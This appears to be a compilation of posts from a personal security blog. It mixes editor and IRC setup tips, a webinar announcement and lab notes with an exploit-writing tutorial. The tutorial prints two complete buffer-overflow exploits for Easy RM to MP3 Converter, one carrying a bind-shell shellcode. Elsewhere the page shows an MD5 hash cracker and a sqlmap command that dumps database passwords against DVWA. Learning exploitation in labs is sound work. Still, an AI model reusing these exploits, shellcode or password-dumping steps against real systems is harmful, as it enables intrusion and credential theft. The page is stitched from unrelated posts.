The issue is some of these IDEs still doesn’t support Django templates, and as Geany uses Scintilla as its highlighting engine you can enable highlighting by executing the following code inside your bash :

lnxg33k@Arabpwn:~$ sed ’11i lexer.html.django=1′ /usr/share/geany/filetypes.html > ~/.config/geany/filedefs/filetypes.html

tested on Ubuntu 11.10 and geany 0.20 (built on Jul  1 2011 with GTK 2.24.5, GLib 2.29.8, GIO)

This Kioptrix VM Image are easy challenges. The object of the game is to acquire
root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability
assessment and exploitation. There are more ways then one to successfully complete the challenges.

::: Download Level 1.1 ::: 415 Megs
MD5 HASH: 9b7db76a1bf9d2074dc7fc17091444f4

Hey folks it’s been quite a while since my last post ‘exams sucks’.

Actually I planned to  publish this post on  isecur1ty in Arabic but due to some issues with it’s contents it will be available on my blog

About 3 days ago I received an email from  an Academic Advisor at Ec-Council University Egypt branch inviting me to a webinar event it’s topic” How to think like a hacker ?“.  During the session Eng/Mohamed Ehsafeey will present some interesting topics

- attacks types, methods and tools
- How attackers getting access to an organization
- How to know new Threats to implement more secure solution
- How to penetrate a machine
- Securing your Network
- Information security professionals Diplomas
- How to apply to EC-Council Uni. ?

Title: How to think like a HACKER ?
Date : Saturday, Jul 23, 2011
Time : 6:30 PM – 10:00 PM EEST
Language: it will be presented in Arabic

System Requirements
PC-based attendees
Required: Windows® 7, Vista, XP or 2003 Server
Macintosh®-based attendees
Required: Mac OS® X 10.5 or newe

Reserve your Webinar seat now from here

It’s great to watch this big jump in information security arena in Arabian countries as i will write a bout another interesting event which will be held soon here in Egypt.

the fisrt tut about a vulnerability in Easy RM to MP3 Conversion Utility
which was reported by Crazy_Hacker with a POC (SP2 ENG) doesn’t work for me

corelanc0d3r rewrote the exploit to work under SP3 :

#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
# Greetings to Saumil and SK 
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp3.m3u";

my $junk= "A" x 26094;
my $eip = pack('V',0x01ccf23a);  #jmp esp from MSRMCcodec02.dll

my $shellcode = "\x90" x 25;

# windows/shell_bind_tcp - 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

I tried the exploit under (SP2 ENG) and found it doesn’t work. So i wrote the exploit in Python:

#!/usr/bin/env python
#
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Vulnerability discovered by Crazy_Hacker who reported with a POC
# The poc was for SP2 (it doesn’t work) http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt
# Corelanc0d3r wrote the sploit again but to work under SP3
# http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
#

import sys

m3uf = sys.argv[1]

buff = ‘A’ *26072
buff += ‘\x3a\xf2\xa8\x01′ # EIP overwrite MSRMCc_2 (01A8F23A JMP ESP)
buff += ‘CCCC’ # 4 bytes of garbage
buff += ‘\x90′ *25 # 25 bytes of nop sleds

# sh-4.1$ msfpayload windows/exec CMD=calc r | msfencode -a x86 -b ‘\x00\x09\x0a’ -t c
buff += (“\xba\xf8\x41\x8a\x4a\xd9\xf7\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1″
“\x32\x83\xeb\xfc\x31\x53\x0e\x03\xab\x4f\x68\xbf\xb7\xb8\xe5″
“\x40\x47\x39\x96\xc9\xa2\x08\x84\xae\xa7\x39\x18\xa4\xe5\xb1″
“\xd3\xe8\x1d\x41\x91\x24\x12\xe2\x1c\x13\x1d\xf3\x90\x9b\xf1″
“\x37\xb2\x67\x0b\x64\x14\x59\xc4\x79\x55\x9e\x38\x71\x07\x77″
“\x37\x20\xb8\xfc\x05\xf9\xb9\xd2\x02\x41\xc2\x57\xd4\x36\x78″
“\x59\x04\xe6\xf7\x11\xbc\x8c\x50\x82\xbd\x41\x83\xfe\xf4\xee”
“\x70\x74\x07\x27\x49\x75\x36\x07\x06\x48\xf7\x8a\x56\x8c\x3f”
“\x75\x2d\xe6\x3c\x08\x36\x3d\x3f\xd6\xb3\xa0\xe7\x9d\x64\x01″
“\x16\x71\xf2\xc2\x14\x3e\x70\x8c\x38\xc1\x55\xa6\x44\x4a\x58″
“\x69\xcd\x08\x7f\xad\x96\xcb\x1e\xf4\x72\xbd\x1f\xe6\xda\x62″
“\xba\x6c\xc8\x77\xbc\x2e\x86\x86\x4c\x55\xef\x89\x4e\x56\x5f”
“\xe2\x7f\xdd\x30\x75\x80\x34\x75\x89\xca\x15\xdf\x02\x93\xcf”
“\x62\x4f\x24\x3a\xa0\x76\xa7\xcf\x58\x8d\xb7\xa5\x5d\xc9\x7f”
“\x55\x2f\x42\xea\x59\x9c\x63\x3f\x3a\x43\xf0\xa3\xbd”)

f= open(m3uf, ‘w’)
f.write(buff)
f.close
print ‘\n[+] File written successfully in %s\n’ % m3uf

Check out the video:

script i used in the tutorial:
m3u.py download
the exploit in python:
Easy_RM_to_MP3-exp.py download

Online/ofline md5 cracker
Currently containes about 14 db for online cracking

here are two snips from the source code:

128   def bigtrapeze():
129     site = 'http://www.bigtrapeze.com/'
130     rest = 'md5/index.php?query=%s' %passwd
131     req = urllib2.Request(site+rest)
132     req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2)\
133     Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2')
134     opener = urllib2.build_opener()
135     data = opener.open(req).read()
136     match = re.search('(=> <strong>)(\w+.\w+)', data)
137     if match: print '[-] site: %s\t\t\tPassword: %s' %(site, match.group(2))
138     else: print '[-] site: %s\t\t\tPassword: Not found' %site
139   bigtrapeze()

211     def offline():
212       print '[+] This opertaion will take some time, be patient ...'
213       dictionary = sys.argv[3]
214       dic = {}
215       shooter = 0
216       try:
217         f = open(dictionary, 'rb')
218         for line in f:
219           line = line.rstrip()
220           dic[line] = hashlib.md5(line).hexdigest()
221         for k in dic.keys():
222           if passwd in dic[k]:
223             print '\n[-] Hash:', dic[k], '   \t\t\t', 'Data:', k
224             shooter += 1
225         if shooter == 0:  print "\n[*]Password not found in [%s] try the online cracker\n" % dictionary
226         f.close()
227       except IOError: print '\n[*] Erorr: %s doesn\'t exsit \n' % dictionary
228     offline()

Tow shots for using both the flags in cracking:

to download it in plain text:

icrack.py download

About Irssi

Irssi is a terminal based IRC client for UNIX systems. It also supports SILC and ICB protocols via plugins.

I will show how to connect to Free node using SSL and irssi

first we need a valid certification for SSL :

bash-4.1# cd /root/ && mkdir ssl && cd ssl

bash-4.1# wget http://rlworkman.net/pkgs/sources/13.0/ca-certificates/ca-certificates.SlackBuild

bash-4.1# wget http://rlworkman.net/pkgs/sources/13.0/ca-certificates/ca-certificates_20090814.tar.gz

bash-4.1# ./ca-certificates.SlackBuild

now we have installed the root ca-certificates

now fire up irssi on your terminal

after the irssi interface comes up just type :
/network add  freenode
/connect -ssl_verify  chat.freenode.net 7000
/save
/network add -autosendcmd “/msg nickserv identify PASSWORD; wait 2000″ freenode
/save
/channel add -auto #intern0t freenode
/save
/set real_name  NAME
/set user_name NICKNAME
/set nick NICKNAME
/set alternate_nick ALTNICKNAME

You can use your preferred theme :
bash-4.1# cd ~/.irssi
bash-4.1# wget http://irssi.org/themefiles/madcow.theme
fireup your irssi again then type:
/set theme madcow
/save

now everything should work great and you should see something like that :

———————————————————

XSS: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

Stored XSS Attacks

Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

——————————————————————————-

1) DVWA uses a PHP Session cookie to authenticate users. If the session cookie is not valid, a page redirection will send you to the login page. This prevents sqlmap from getting access to the injection location. This can be fixed by adding the –cookie “cookie data” option. How do you get your cookie data you may ask. My favorite way is to add a shortcut on your favorites menu with a link to “javascript: alert(document.cookie);”. Click on the link – sooner then you can say “C is for cookie” you have it.

2) sqlmap uses a comparison to determine if the entered SQLi phrase was successful or not. It is built to work on more secure pages (It isn’t used to something as DV as DVWA). So…to fix this, we can feed it a string that will only show up on success. What string would that be? I like to use “First name”. You can use whatever you want (so long as it only is on the page from a successful query). Use the –string option to do this.

3) I know, I know – I said there were only two things. By default DVWA should connect to the MySQL database as root. If you have changed this, then quit fixing things (Just kidding – way to think secure – this should be a lesson for any DBAs out there that happen to find this). sqlmap is able to do much more if it has access (via injection) to the database as a root user.

To get started try something like this:

./sqlmap.py -u “http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie “[enter cookie data here]” -p id –string “First name:” –passwords –dbs

captured from DVWA forum

to get a copy of DVWA : http://www.dvwa.co.uk/download.php

——————————————

* Hello and welcome to lnxg33l blog

I have just written ideocder script :it’s a multi encoding/decoding script contains a lot of   encoders/decoders offered by python lang

Some new features of the script:

the ability to encode/decode files with base64 and uuencode

Hex_entity and ASCII add to the script

here’s the link to download the script :

—-> ideocder.py <—- rapid-share link

—-> idecoder.py <—- mediafire link

==============================

TRY2HACK

This site provides several security-oriented challenges for your entertainment. It is actually one of the oldest challenge sites still around

————————————————————————————————————————————————